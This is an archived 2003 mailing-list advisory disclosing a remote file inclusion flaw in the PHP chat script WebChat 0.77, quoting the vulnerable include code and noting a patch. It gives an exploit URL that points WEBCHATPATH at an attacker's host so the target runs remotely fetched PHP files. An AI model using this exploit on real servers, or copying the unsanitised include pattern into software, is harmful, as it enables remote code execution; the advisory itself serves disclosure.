WebChat (PHP)

From: Frog Man (leseulfrogat_private)
Date: Mon Mar 03 2003 - 04:57:43 PST

Next message: infoat_private: "Implementation flaws in Adobe Document Server for Reader Extensions"

Previous message: Daniel Ahlberg: "GLSA: eterm (200303-1)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Informations :
АААААААААААААА
Version : 0.77
Website : http://www.webdev.ro
Problem : File Including


PHP Code/Location :
ААААААААААААААААААА
defines.php :
-----------------------------------------------
<?
if (!isset($WEBCHATPATH)) {
	 $WEBCHATPATH = './';
}
include ($WEBCHATPATH.'db_mysql.php');
include ($WEBCHATPATH.'language/english.php');
[...]
-----------------------------------------------


Exploits :
АААААААААА
http://[target]/defines.php?WEBCHATPATH=http://[attacker]/
with :
http://[attacker]/db_mysql.php and
http://[attacker]/language/english.php


Patch :
ААААААА
A patch can be found on http://www.phpsecure.info (-> New Version !! :))



More Details :
АААААААААААААА
In French :
http://www.frog-man.org/tutos/WebChat.txt




frog-m@n


_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !  
http://messenger.fr.msn.be

Next message: infoat_private: "Implementation flaws in Adobe Document Server for Reader Extensions"
Previous message: Daniel Ahlberg: "GLSA: eterm (200303-1)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Mar 03 2003 - 08:05:25 PST